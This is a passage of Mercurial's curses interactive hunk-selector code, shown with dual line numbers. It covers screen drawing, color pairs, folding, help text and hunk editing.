1041 1038 while nextitem != enditem.nextitem():
1042 1039 if nextitem.applied != desiredstate:
1043 1040 self.toggleapply(item=nextitem)
1044 1041 nextitem = nextitem.nextitem()
1045 1042
1046 1043 def togglefolded(self, item=None, foldparent=False):
1047 1044 """toggle folded flag of specified item (defaults to currently
1048 1045 selected)"""
1049 1046 if item is None:
1050 1047 item = self.currentselecteditem
1051 1048 if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
1052 1049 if not isinstance(item, uiheader):
1053 1050 # we need to select the parent item in this case
1054 1051 self.currentselecteditem = item = item.parentitem()
1055 1052 elif item.neverunfolded:
1056 1053 item.neverunfolded = False
1057 1054
1058 1055 # also fold any foldable children of the parent/current item
1059 1056 if isinstance(item, uiheader): # the original or 'new' item
1060 1057 for child in item.allchildren():
1061 1058 child.folded = not item.folded
1062 1059
1063 1060 if isinstance(item, (uiheader, uihunk)):
1064 1061 item.folded = not item.folded
1065 1062
1066 1063 def alignstring(self, instr, window):
1067 1064 """
1068 1065 add whitespace to the end of a string in order to make it fill
1069 1066 the screen in the x direction. the current cursor position is
1070 1067 taken into account when making this calculation. the string can span
1071 1068 multiple lines.
1072 1069 """
1073 1070 y, xstart = window.getyx()
1074 1071 width = self.xscreensize
1075 1072 # turn tabs into spaces
1076 1073 instr = instr.expandtabs(4)
1077 1074 strwidth = encoding.colwidth(instr)
1078 1075 numspaces = width - ((strwidth + xstart) % width)
1079 1076 return instr + b" " * numspaces
1080 1077
1081 1078 def printstring(
1082 1079 self,
1083 1080 window,
1084 1081 text,
1085 1082 fgcolor=None,
1086 1083 bgcolor=None,
1087 1084 pair=None,
1088 1085 pairname=None,
1089 1086 attrlist=None,
1090 1087 towin=True,
1091 1088 align=True,
1092 1089 showwhtspc=False,
1093 1090 ):
1094 1091 """
1095 1092 print the string, text, with the specified colors and attributes, to
1096 1093 the specified curses window object.
1097 1094
1098 1095 the foreground and background colors are of the form
1099 1096 curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
1100 1097 magenta, red, white, yellow]. if pairname is provided, a color
1101 1098 pair will be looked up in the self.colorpairnames dictionary.
1102 1099
1103 1100 attrlist is a list containing text attributes in the form of
1104 1101 curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
1105 1102 underline].
1106 1103
1107 1104 if align == True, whitespace is added to the printed string such that
1108 1105 the string stretches to the right border of the window.
1109 1106
1110 1107 if showwhtspc == True, trailing whitespace of a string is highlighted.
1111 1108 """
1112 1109 # preprocess the text, converting tabs to spaces
1113 1110 text = text.expandtabs(4)
1114 1111 # strip \n, and convert control characters to ^[char] representation
1115 1112 text = re.sub(
1116 1113 br'[\x00-\x08\x0a-\x1f]',
1117 1114 lambda m: b'^' + pycompat.sysbytes(chr(ord(m.group()) + 64)),
1118 1115 text.strip(b'\n'),
1119 1116 )
1120 1117
1121 1118 if pair is not None:
1122 1119 colorpair = pair
1123 1120 elif pairname is not None:
1124 1121 colorpair = self.colorpairnames[pairname]
1125 1122 else:
1126 1123 if fgcolor is None:
1127 1124 fgcolor = -1
1128 1125 if bgcolor is None:
1129 1126 bgcolor = -1
1130 1127 if (fgcolor, bgcolor) in self.colorpairs:
1131 1128 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1132 1129 else:
1133 1130 colorpair = self.getcolorpair(fgcolor, bgcolor)
1134 1131 # add attributes if possible
1135 1132 if attrlist is None:
1136 1133 attrlist = []
1137 1134 if colorpair < 256:
1138 1135 # then it is safe to apply all attributes
1139 1136 for textattr in attrlist:
1140 1137 colorpair |= textattr
1141 1138 else:
1142 1139 # just apply a select few (safe?) attributes
1143 1140 for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
1144 1141 if textattr in attrlist:
1145 1142 colorpair |= textattr
1146 1143
1147 1144 y, xstart = self.chunkpad.getyx()
1148 1145 t = b"" # variable for counting lines printed
1149 1146 # if requested, show trailing whitespace
1150 1147 if showwhtspc:
1151 1148 origlen = len(text)
1152 1149 text = text.rstrip(b' \n') # tabs have already been expanded
1153 1150 strippedlen = len(text)
1154 1151 numtrailingspaces = origlen - strippedlen
1155 1152
1156 1153 if towin:
1157 1154 window.addstr(text, colorpair)
1158 1155 t += text
1159 1156
1160 1157 if showwhtspc:
1161 1158 wscolorpair = colorpair | curses.A_REVERSE
1162 1159 if towin:
1163 1160 for i in range(numtrailingspaces):
1164 1161 window.addch(curses.ACS_CKBOARD, wscolorpair)
1165 1162 t += b" " * numtrailingspaces
1166 1163
1167 1164 if align:
1168 1165 if towin:
1169 1166 extrawhitespace = self.alignstring(b"", window)
1170 1167 window.addstr(extrawhitespace, colorpair)
1171 1168 else:
1172 1169 # need to use t, since the x position hasn't incremented
1173 1170 extrawhitespace = self.alignstring(t, window)
1174 1171 t += extrawhitespace
1175 1172
1176 1173 # is reset to 0 at the beginning of printitem()
1177 1174
1178 1175 linesprinted = (xstart + len(t)) // self.xscreensize
1179 1176 self.linesprintedtopadsofar += linesprinted
1180 1177 return t
1181 1178
1182 1179 def _getstatuslinesegments(self):
1183 1180 """-> [str]. return segments"""
1184 1181 selected = self.currentselecteditem.applied
1185 1182 spaceselect = _(b'space/enter: select')
1186 1183 spacedeselect = _(b'space/enter: deselect')
1187 1184 # Format the selected label into a place as long as the longer of the
1188 1185 # two possible labels. This may vary by language.
1189 1186 spacelen = max(len(spaceselect), len(spacedeselect))
1190 1187 selectedlabel = b'%-*s' % (
1191 1188 spacelen,
1192 1189 spacedeselect if selected else spaceselect,
1193 1190 )
1194 1191 segments = [
1195 1192 _headermessages[self.operation],
1196 1193 b'-',
1197 1194 _(b'[x]=selected **=collapsed'),
1198 1195 _(b'c: confirm'),
1199 1196 _(b'q: abort'),
1200 1197 _(b'arrow keys: move/expand/collapse'),
1201 1198 selectedlabel,
1202 1199 _(b'?: help'),
1203 1200 ]
1204 1201 return segments
1205 1202
1206 1203 def _getstatuslines(self):
1207 1204 """() -> [str]. return short help used in the top status window"""
1208 1205 if self.errorstr is not None:
1209 1206 lines = [self.errorstr, _(b'Press any key to continue')]
1210 1207 else:
1211 1208 # wrap segments to lines
1212 1209 segments = self._getstatuslinesegments()
1213 1210 width = self.xscreensize
1214 1211 lines = []
1215 1212 lastwidth = width
1216 1213 for s in segments:
1217 1214 w = encoding.colwidth(s)
1218 1215 sep = b' ' * (1 + (s and s[0] not in b'-['))
1219 1216 if lastwidth + w + len(sep) >= width:
1220 1217 lines.append(s)
1221 1218 lastwidth = w
1222 1219 else:
1223 1220 lines[-1] += sep + s
1224 1221 lastwidth += w + len(sep)
1225 1222 if len(lines) != self.numstatuslines:
1226 1223 self.numstatuslines = len(lines)
1227 1224 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1228 1225 return [stringutil.ellipsis(l, self.xscreensize - 1) for l in lines]
1229 1226
1230 1227 def updatescreen(self):
1231 1228 self.statuswin.erase()
1232 1229 self.chunkpad.erase()
1233 1230
1234 1231 printstring = self.printstring
1235 1232
1236 1233 # print out the status lines at the top
1237 1234 try:
1238 1235 for line in self._getstatuslines():
1239 1236 printstring(self.statuswin, line, pairname=b"legend")
1240 1237 self.statuswin.refresh()
1241 1238 except curses.error:
1242 1239 pass
1243 1240 if self.errorstr is not None:
1244 1241 return
1245 1242
1246 1243 # print out the patch in the remaining part of the window
1247 1244 try:
1248 1245 self.printitem()
1249 1246 self.updatescroll()
1250 1247 self.chunkpad.refresh(
1251 1248 self.firstlineofpadtoprint,
1252 1249 0,
1253 1250 self.numstatuslines,
1254 1251 0,
1255 1252 self.yscreensize - self.numstatuslines,
1256 1253 self.xscreensize,
1257 1254 )
1258 1255 except curses.error:
1259 1256 pass
1260 1257
1261 1258 def getstatusprefixstring(self, item):
1262 1259 """
1263 1260 create a string to prefix a line with which indicates whether 'item'
1264 1261 is applied and/or folded.
1265 1262 """
1266 1263
1267 1264 # create checkbox string
1268 1265 if item.applied:
1269 1266 if not isinstance(item, uihunkline) and item.partial:
1270 1267 checkbox = b"[~]"
1271 1268 else:
1272 1269 checkbox = b"[x]"
1273 1270 else:
1274 1271 checkbox = b"[ ]"
1275 1272
1276 1273 try:
1277 1274 if item.folded:
1278 1275 checkbox += b"**"
1279 1276 if isinstance(item, uiheader):
1280 1277 # one of "m", "a", or "d" (modified, added, deleted)
1281 1278 filestatus = item.changetype
1282 1279
1283 1280 checkbox += filestatus + b" "
1284 1281 else:
1285 1282 checkbox += b" "
1286 1283 if isinstance(item, uiheader):
1287 1284 # add two more spaces for headers
1288 1285 checkbox += b" "
1289 1286 except AttributeError: # not foldable
1290 1287 checkbox += b" "
1291 1288
1292 1289 return checkbox
1293 1290
1294 1291 def printheader(
1295 1292 self, header, selected=False, towin=True, ignorefolding=False
1296 1293 ):
1297 1294 """
1298 1295 print the header to the pad. if countlines is True, don't print
1299 1296 anything, but just count the number of lines which would be printed.
1300 1297 """
1301 1298
1302 1299 outstr = b""
1303 1300 text = header.prettystr()
1304 1301 chunkindex = self.chunklist.index(header)
1305 1302
1306 1303 if chunkindex != 0 and not header.folded:
1307 1304 # add separating line before headers
1308 1305 outstr += self.printstring(
1309 1306 self.chunkpad, b'_' * self.xscreensize, towin=towin, align=False
1310 1307 )
1311 1308 # select color-pair based on if the header is selected
1312 1309 colorpair = self.getcolorpair(
1313 1310 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1314 1311 )
1315 1312
1316 1313 # print out each line of the chunk, expanding it to screen width
1317 1314
1318 1315 # number of characters to indent lines on this level by
1319 1316 indentnumchars = 0
1320 1317 checkbox = self.getstatusprefixstring(header)
1321 1318 if not header.folded or ignorefolding:
1322 1319 textlist = text.split(b"\n")
1323 1320 linestr = checkbox + textlist[0]
1324 1321 else:
1325 1322 linestr = checkbox + header.filename()
1326 1323 outstr += self.printstring(
1327 1324 self.chunkpad, linestr, pair=colorpair, towin=towin
1328 1325 )
1329 1326 if not header.folded or ignorefolding:
1330 1327 if len(textlist) > 1:
1331 1328 for line in textlist[1:]:
1332 1329 linestr = b" " * (indentnumchars + len(checkbox)) + line
1333 1330 outstr += self.printstring(
1334 1331 self.chunkpad, linestr, pair=colorpair, towin=towin
1335 1332 )
1336 1333
1337 1334 return outstr
1338 1335
1339 1336 def printhunklinesbefore(
1340 1337 self, hunk, selected=False, towin=True, ignorefolding=False
1341 1338 ):
1342 1339 """includes start/end line indicator"""
1343 1340 outstr = b""
1344 1341 # where hunk is in list of siblings
1345 1342 hunkindex = hunk.header.hunks.index(hunk)
1346 1343
1347 1344 if hunkindex != 0:
1348 1345 # add separating line before headers
1349 1346 outstr += self.printstring(
1350 1347 self.chunkpad, b' ' * self.xscreensize, towin=towin, align=False
1351 1348 )
1352 1349
1353 1350 colorpair = self.getcolorpair(
1354 1351 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1355 1352 )
1356 1353
1357 1354 # print out from-to line with checkbox
1358 1355 checkbox = self.getstatusprefixstring(hunk)
1359 1356
1360 1357 lineprefix = b" " * self.hunkindentnumchars + checkbox
1361 1358 frtoline = b" " + hunk.getfromtoline().strip(b"\n")
1362 1359
1363 1360 outstr += self.printstring(
1364 1361 self.chunkpad, lineprefix, towin=towin, align=False
1365 1362 ) # add uncolored checkbox/indent
1366 1363 outstr += self.printstring(
1367 1364 self.chunkpad, frtoline, pair=colorpair, towin=towin
1368 1365 )
1369 1366
1370 1367 if hunk.folded and not ignorefolding:
1371 1368 # skip remainder of output
1372 1369 return outstr
1373 1370
1374 1371 # print out lines of the chunk preceeding changed-lines
1375 1372 for line in hunk.before:
1376 1373 linestr = (
1377 1374 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1378 1375 )
1379 1376 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1380 1377
1381 1378 return outstr
1382 1379
1383 1380 def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
1384 1381 outstr = b""
1385 1382 if hunk.folded and not ignorefolding:
1386 1383 return outstr
1387 1384
1388 1385 # a bit superfluous, but to avoid hard-coding indent amount
1389 1386 checkbox = self.getstatusprefixstring(hunk)
1390 1387 for line in hunk.after:
1391 1388 linestr = (
1392 1389 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1393 1390 )
1394 1391 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1395 1392
1396 1393 return outstr
1397 1394
1398 1395 def printhunkchangedline(self, hunkline, selected=False, towin=True):
1399 1396 outstr = b""
1400 1397 checkbox = self.getstatusprefixstring(hunkline)
1401 1398
1402 1399 linestr = hunkline.prettystr().strip(b"\n")
1403 1400
1404 1401 # select color-pair based on whether line is an addition/removal
1405 1402 if selected:
1406 1403 colorpair = self.getcolorpair(name=b"selected")
1407 1404 elif linestr.startswith(b"+"):
1408 1405 colorpair = self.getcolorpair(name=b"addition")
1409 1406 elif linestr.startswith(b"-"):
1410 1407 colorpair = self.getcolorpair(name=b"deletion")
1411 1408 elif linestr.startswith(b"\\"):
1412 1409 colorpair = self.getcolorpair(name=b"normal")
1413 1410
1414 1411 lineprefix = b" " * self.hunklineindentnumchars + checkbox
1415 1412 outstr += self.printstring(
1416 1413 self.chunkpad, lineprefix, towin=towin, align=False
1417 1414 ) # add uncolored checkbox/indent
1418 1415 outstr += self.printstring(
1419 1416 self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
1420 1417 )
1421 1418 return outstr
1422 1419
1423 1420 def printitem(
1424 1421 self, item=None, ignorefolding=False, recursechildren=True, towin=True
1425 1422 ):
1426 1423 """
1427 1424 use __printitem() to print the the specified item.applied.
1428 1425 if item is not specified, then print the entire patch.
1429 1426 (hiding folded elements, etc. -- see __printitem() docstring)
1430 1427 """
1431 1428
1432 1429 if item is None:
1433 1430 item = self.headerlist
1434 1431 if recursechildren:
1435 1432 self.linesprintedtopadsofar = 0
1436 1433
1437 1434 outstr = []
1438 1435 self.__printitem(
1439 1436 item, ignorefolding, recursechildren, outstr, towin=towin
1440 1437 )
1441 1438 return b''.join(outstr)
1442 1439
1443 1440 def outofdisplayedarea(self):
1444 1441 y, _ = self.chunkpad.getyx() # cursor location
1445 1442 # * 2 here works but an optimization would be the max number of
1446 1443 # consecutive non selectable lines
1447 1444 # i.e the max number of context line for any hunk in the patch
1448 1445 miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
1449 1446 maxy = self.firstlineofpadtoprint + self.yscreensize * 2
1450 1447 return y < miny or y > maxy
1451 1448
1452 1449 def handleselection(self, item, recursechildren):
1453 1450 selected = item is self.currentselecteditem
1454 1451 if selected and recursechildren:
1455 1452 # assumes line numbering starting from line 0
1456 1453 self.selecteditemstartline = self.linesprintedtopadsofar
1457 1454 selecteditemlines = self.getnumlinesdisplayed(
1458 1455 item, recursechildren=False
1459 1456 )
1460 1457 self.selecteditemendline = (
1461 1458 self.selecteditemstartline + selecteditemlines - 1
1462 1459 )
1463 1460 return selected
1464 1461
1465 1462 def __printitem(
1466 1463 self, item, ignorefolding, recursechildren, outstr, towin=True
1467 1464 ):
1468 1465 """
1469 1466 recursive method for printing out patch/header/hunk/hunk-line data to
1470 1467 screen. also returns a string with all of the content of the displayed
1471 1468 patch (not including coloring, etc.).
1472 1469
1473 1470 if ignorefolding is True, then folded items are printed out.
1474 1471
1475 1472 if recursechildren is False, then only print the item without its
1476 1473 child items.
1477 1474 """
1478 1475
1479 1476 if towin and self.outofdisplayedarea():
1480 1477 return
1481 1478
1482 1479 selected = self.handleselection(item, recursechildren)
1483 1480
1484 1481 # patch object is a list of headers
1485 1482 if isinstance(item, patch):
1486 1483 if recursechildren:
1487 1484 for hdr in item:
1488 1485 self.__printitem(
1489 1486 hdr, ignorefolding, recursechildren, outstr, towin
1490 1487 )
1491 1488 # todo: eliminate all isinstance() calls
1492 1489 if isinstance(item, uiheader):
1493 1490 outstr.append(
1494 1491 self.printheader(
1495 1492 item, selected, towin=towin, ignorefolding=ignorefolding
1496 1493 )
1497 1494 )
1498 1495 if recursechildren:
1499 1496 for hnk in item.hunks:
1500 1497 self.__printitem(
1501 1498 hnk, ignorefolding, recursechildren, outstr, towin
1502 1499 )
1503 1500 elif isinstance(item, uihunk) and (
1504 1501 (not item.header.folded) or ignorefolding
1505 1502 ):
1506 1503 # print the hunk data which comes before the changed-lines
1507 1504 outstr.append(
1508 1505 self.printhunklinesbefore(
1509 1506 item, selected, towin=towin, ignorefolding=ignorefolding
1510 1507 )
1511 1508 )
1512 1509 if recursechildren:
1513 1510 for l in item.changedlines:
1514 1511 self.__printitem(
1515 1512 l, ignorefolding, recursechildren, outstr, towin
1516 1513 )
1517 1514 outstr.append(
1518 1515 self.printhunklinesafter(
1519 1516 item, towin=towin, ignorefolding=ignorefolding
1520 1517 )
1521 1518 )
1522 1519 elif isinstance(item, uihunkline) and (
1523 1520 (not item.hunk.folded) or ignorefolding
1524 1521 ):
1525 1522 outstr.append(
1526 1523 self.printhunkchangedline(item, selected, towin=towin)
1527 1524 )
1528 1525
1529 1526 return outstr
1530 1527
1531 1528 def getnumlinesdisplayed(
1532 1529 self, item=None, ignorefolding=False, recursechildren=True
1533 1530 ):
1534 1531 """
1535 1532 return the number of lines which would be displayed if the item were
1536 1533 to be printed to the display. the item will not be printed to the
1537 1534 display (pad).
1538 1535 if no item is given, assume the entire patch.
1539 1536 if ignorefolding is True, folded items will be unfolded when counting
1540 1537 the number of lines.
1541 1538 """
1542 1539
1543 1540 # temporarily disable printing to windows by printstring
1544 1541 patchdisplaystring = self.printitem(
1545 1542 item, ignorefolding, recursechildren, towin=False
1546 1543 )
1547 1544 numlines = len(patchdisplaystring) // self.xscreensize
1548 1545 return numlines
1549 1546
1550 1547 def sigwinchhandler(self, n, frame):
1551 1548 """handle window resizing"""
1552 1549 try:
1553 1550 curses.endwin()
1554 1551 self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
1555 1552 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1556 1553 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1557 1554 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1558 1555 except curses.error:
1559 1556 pass
1560 1557
1561 1558 def getcolorpair(
1562 1559 self, fgcolor=None, bgcolor=None, name=None, attrlist=None
1563 1560 ):
1564 1561 """
1565 1562 get a curses color pair, adding it to self.colorpairs if it is not
1566 1563 already defined. an optional string, name, can be passed as a shortcut
1567 1564 for referring to the color-pair. by default, if no arguments are
1568 1565 specified, the white foreground / black background color-pair is
1569 1566 returned.
1570 1567
1571 1568 it is expected that this function will be used exclusively for
1572 1569 initializing color pairs, and not curses.init_pair().
1573 1570
1574 1571 attrlist is used to 'flavor' the returned color-pair. this information
1575 1572 is not stored in self.colorpairs. it contains attribute values like
1576 1573 curses.A_BOLD.
1577 1574 """
1578 1575
1579 1576 if (name is not None) and name in self.colorpairnames:
1580 1577 # then get the associated color pair and return it
1581 1578 colorpair = self.colorpairnames[name]
1582 1579 else:
1583 1580 if fgcolor is None:
1584 1581 fgcolor = -1
1585 1582 if bgcolor is None:
1586 1583 bgcolor = -1
1587 1584 if (fgcolor, bgcolor) in self.colorpairs:
1588 1585 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1589 1586 else:
1590 1587 pairindex = len(self.colorpairs) + 1
1591 1588 if self.usecolor:
1592 1589 curses.init_pair(pairindex, fgcolor, bgcolor)
1593 1590 colorpair = self.colorpairs[
1594 1591 (fgcolor, bgcolor)
1595 1592 ] = curses.color_pair(pairindex)
1596 1593 if name is not None:
1597 1594 self.colorpairnames[name] = curses.color_pair(pairindex)
1598 1595 else:
1599 1596 cval = 0
1600 1597 if name is not None:
1601 1598 if name == b'selected':
1602 1599 cval = curses.A_REVERSE
1603 1600 self.colorpairnames[name] = cval
1604 1601 colorpair = self.colorpairs[(fgcolor, bgcolor)] = cval
1605 1602
1606 1603 # add attributes if possible
1607 1604 if attrlist is None:
1608 1605 attrlist = []
1609 1606 if colorpair < 256:
1610 1607 # then it is safe to apply all attributes
1611 1608 for textattr in attrlist:
1612 1609 colorpair |= textattr
1613 1610 else:
1614 1611 # just apply a select few (safe?) attributes
1615 1612 for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
1616 1613 if textattrib in attrlist:
1617 1614 colorpair |= textattrib
1618 1615 return colorpair
1619 1616
1620 1617 def initcolorpair(self, *args, **kwargs):
1621 1618 """same as getcolorpair."""
1622 1619 self.getcolorpair(*args, **kwargs)
1623 1620
1624 1621 def helpwindow(self):
1625 1622 """print a help window to the screen. exit after any keypress."""
1626 1623 helptext = _(
1627 1624 """ [press any key to return to the patch-display]
1628 1625
1629 1626 The curses hunk selector allows you to interactively choose among the
1630 1627 changes you have made, and confirm only those changes you select for
1631 1628 further processing by the command you are running (such as commit,
1632 1629 shelve, or revert). After confirming the selected changes, the
1633 1630 unselected changes are still present in your working copy, so you can
1634 1631 use the hunk selector multiple times to split large changes into
1635 1632 smaller changesets. the following are valid keystrokes:
1636 1633
1637 1634 x [space] : (un-)select item ([~]/[x] = partly/fully applied)
1638 1635 [enter] : (un-)select item and go to next item of same type
1639 1636 A : (un-)select all items
1640 1637 X : (un-)select all items between current and most-recent
1641 1638 up/down-arrow [k/j] : go to previous/next unfolded item
1642 1639 pgup/pgdn [K/J] : go to previous/next item of same type
1643 1640 right/left-arrow [l/h] : go to child item / parent item
1644 1641 shift-left-arrow [H] : go to parent header / fold selected header
1645 1642 g : go to the top
1646 1643 G : go to the bottom
1647 1644 f : fold / unfold item, hiding/revealing its children
1648 1645 F : fold / unfold parent item and all of its ancestors
1649 1646 ctrl-l : scroll the selected line to the top of the screen
1650 1647 m : edit / resume editing the commit message
1651 1648 e : edit the currently selected hunk
1652 1649 a : toggle all selections
1653 1650 c : confirm selected changes
1654 1651 r : review/edit and confirm selected changes
1655 1652 q : quit without confirming (no changes will be made)
1656 1653 ? : help (what you're currently reading)"""
1657 1654 )
1658 1655
1659 1656 helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
1660 1657 helplines = helptext.split(b"\n")
1661 1658 helplines = helplines + [b" "] * (
1662 1659 self.yscreensize - self.numstatuslines - len(helplines) - 1
1663 1660 )
1664 1661 try:
1665 1662 for line in helplines:
1666 1663 self.printstring(helpwin, line, pairname=b"legend")
1667 1664 except curses.error:
1668 1665 pass
1669 1666 helpwin.refresh()
1670 1667 try:
1671 1668 with self.ui.timeblockedsection(b'crecord'):
1672 1669 helpwin.getkey()
1673 1670 except curses.error:
1674 1671 pass
1675 1672
1676 1673 def commitMessageWindow(self):
1677 1674 """Create a temporary commit message editing window on the screen."""
1678 1675
1679 1676 curses.raw()
1680 1677 curses.def_prog_mode()
1681 1678 curses.endwin()
1682 1679 self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
1683 1680 curses.cbreak()
1684 1681 self.stdscr.refresh()
1685 1682 self.stdscr.keypad(1) # allow arrow-keys to continue to function
1686 1683
1687 1684 def handlefirstlineevent(self):
1688 1685 """
1689 1686 Handle 'g' to navigate to the top most file in the ncurses window.
1690 1687 """
1691 1688 self.currentselecteditem = self.headerlist[0]
1692 1689 currentitem = self.currentselecteditem
1693 1690 # select the parent item recursively until we're at a header
1694 1691 while True:
1695 1692 nextitem = currentitem.parentitem()
1696 1693 if nextitem is None:
1697 1694 break
1698 1695 else:
1699 1696 currentitem = nextitem
1700 1697
1701 1698 self.currentselecteditem = currentitem
1702 1699
1703 1700 def handlelastlineevent(self):
1704 1701 """
1705 1702 Handle 'G' to navigate to the bottom most file/hunk/line depending
1706 1703 on the whether the fold is active or not.
1707 1704
1708 1705 If the bottom most file is folded, it navigates to that file and
1709 1706 stops there. If the bottom most file is unfolded, it navigates to
1710 1707 the bottom most hunk in that file and stops there. If the bottom most
1711 1708 hunk is unfolded, it navigates to the bottom most line in that hunk.
1712 1709 """
1713 1710 currentitem = self.currentselecteditem
1714 1711 nextitem = currentitem.nextitem()
1715 1712 # select the child item recursively until we're at a footer
1716 1713 while nextitem is not None:
1717 1714 nextitem = currentitem.nextitem()
1718 1715 if nextitem is None:
1719 1716 break
1720 1717 else:
1721 1718 currentitem = nextitem
1722 1719
1723 1720 self.currentselecteditem = currentitem
1724 1721 self.recenterdisplayedarea()
1725 1722
1726 1723 def confirmationwindow(self, windowtext):
1727 1724 """display an informational window, then wait for and return a
1728 1725 keypress."""
1729 1726
1730 1727 confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
1731 1728 try:
1732 1729 lines = windowtext.split(b"\n")
1733 1730 for line in lines:
1734 1731 self.printstring(confirmwin, line, pairname=b"selected")
1735 1732 except curses.error:
1736 1733 pass
1737 1734 self.stdscr.refresh()
1738 1735 confirmwin.refresh()
1739 1736 try:
1740 1737 with self.ui.timeblockedsection(b'crecord'):
1741 1738 response = chr(self.stdscr.getch())
1742 1739 except ValueError:
1743 1740 response = None
1744 1741
1745 1742 return response
1746 1743
1747 1744 def reviewcommit(self):
1748 1745 """ask for 'y' to be pressed to confirm selected. return True if
1749 1746 confirmed."""
1750 1747 confirmtext = _(
1751 1748 """If you answer yes to the following, your currently chosen patch chunks
1752 1749 will be loaded into an editor. To modify the patch, make the changes in your
1753 1750 editor and save. To accept the current patch as-is, close the editor without
1754 1751 saving.
1755 1752
1756 1753 note: don't add/remove lines unless you also modify the range information.
1757 1754 failing to follow this rule will result in the commit aborting.
1758 1755
1759 1756 are you sure you want to review/edit and confirm the selected changes [yn]?
1760 1757 """
1761 1758 )
1762 1759 with self.ui.timeblockedsection(b'crecord'):
1763 1760 response = self.confirmationwindow(confirmtext)
1764 1761 if response is None:
1765 1762 response = "n"
1766 1763 if response.lower().startswith("y"):
1767 1764 return True
1768 1765 else:
1769 1766 return False
1770 1767
1771 1768 def recenterdisplayedarea(self):
1772 1769 """
1773 1770 once we scrolled with pg up pg down we can be pointing outside of the
1774 1771 display zone. we print the patch with towin=False to compute the
1775 1772 location of the selected item even though it is outside of the displayed
1776 1773 zone and then update the scroll.
1777 1774 """
1778 1775 self.printitem(towin=False)
1779 1776 self.updatescroll()
1780 1777
1781 1778 def toggleedit(self, item=None, test=False):
1782 1779 """
1783 1780 edit the currently selected chunk
1784 1781 """
1785 1782
1786 1783 def updateui(self):
1787 1784 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1788 1785 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1789 1786 self.updatescroll()
1790 1787 self.stdscr.refresh()
1791 1788 self.statuswin.refresh()
1792 1789 self.stdscr.keypad(1)
1793 1790
1794 1791 def editpatchwitheditor(self, chunk):
1795 1792 if chunk is None:
1796 1793 self.ui.write(_(b'cannot edit patch for whole file'))
1797 1794 self.ui.write(b"\n")
1798 1795 return None
1799 1796 if chunk.header.binary():
1800 1797 self.ui.write(_(b'cannot edit patch for binary file'))
1801 1798 self.ui.write(b"\n")
1802 1799 return None
1803 1800
1804 1801 # write the initial patch
1805 1802 patch = stringio()
1806 1803 patch.write(diffhelptext + hunkhelptext)
1807 1804 chunk.header.write(patch)
1808 1805 chunk.write(patch)
1809 1806
1810 1807 # start the editor and wait for it to complete
1811 1808 try:
1812 1809 patch = self.ui.edit(patch.getvalue(), b"", action=b"diff")
1813 1810 except error.Abort as exc:
1814 1811 self.errorstr = stringutil.forcebytestr(exc)
1815 1812 return None
1816 1813 finally:
1817 1814 self.stdscr.clear()
1818 1815 self.stdscr.refresh()
1819 1816
1820 1817 # remove comment lines
1821 1818 patch = [
1822 1819 line + b'\n'
1823 1820 for line in patch.splitlines()
1824 1821 if not line.startswith(b'#')
1825 1822 ]
1826 1823 return patchmod.parsepatch(patch)
1827 1824
1828 1825 if item is None:
1829 1826 item = self.currentselecteditem
1830 1827 if isinstance(item, uiheader):
1831 1828 return
1832 1829 if isinstance(item, uihunkline):
1833 1830 item = item.parentitem()
1834 1831 if not isinstance(item, uihunk):
1835 1832 return
1836 1833
1837 1834 # To go back to that hunk or its replacement at the end of the edit
1838 1835 itemindex = item.parentitem().hunks.index(item)
1839 1836
1840 1837 beforeadded, beforeremoved = item.added, item.removed
1841 1838 newpatches = editpatchwitheditor(self, item)
1842 1839 if newpatches is None:
1843 1840 if not test:
1844 1841 updateui(self)
1845 1842 return
1846 1843 header = item.header
1847 1844 editedhunkindex = header.hunks.index(item)
1848 1845 hunksbefore = header.hunks[:editedhunkindex]
1849 1846 hunksafter = header.hunks[editedhunkindex + 1 :]
1850 1847 newpatchheader = newpatches[0]
1851 1848 newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
1852 1849 newadded = sum([h.added for h in newhunks])
1853 1850 newremoved = sum([h.removed for h in newhunks])
1854 1851 offset = (newadded - beforeadded) - (newremoved - beforeremoved)
1855 1852
1856 1853 for h in hunksafter:
1857 1854 h.toline += offset
1858 1855 for h in newhunks:
1859 1856 h.folded = False
1860 1857 header.hunks = hunksbefore + newhunks + hunksafter
1861 1858 if self.emptypatch():
1862 1859 header.hunks = hunksbefore + [item] + hunksafter
1863 1860 self.currentselecteditem = header
1864 1861 if len(header.hunks) > itemindex:
1865 1862 self.currentselecteditem = header.hunks[itemindex]
1866 1863
1867 1864 if not test:
1868 1865 updateui(self)
1869 1866
1870 1867 def emptypatch(self):
1871 1868 item = self.headerlist
1872 1869 if not item:
1873 1870 return True
1874 1871 for header in item:
1875 1872 if header.hunks:
1876 1873 return False
1877 1874 return True
1878 1875
1879 1876 def handlekeypressed(self, keypressed, test=False):
1880 1877 """
1881 1878 Perform actions based on pressed keys.
1882 1879
1883 1880 Return true to exit the main loop.
1884 1881 """
1885 1882 if keypressed in ["k", "KEY_UP"]:
1886 1883 self.uparrowevent()
1887 1884 elif keypressed in ["K", "KEY_PPAGE"]:
1888 1885 self.uparrowshiftevent()
1889 1886 elif keypressed in ["j", "KEY_DOWN"]:
1890 1887 self.downarrowevent()
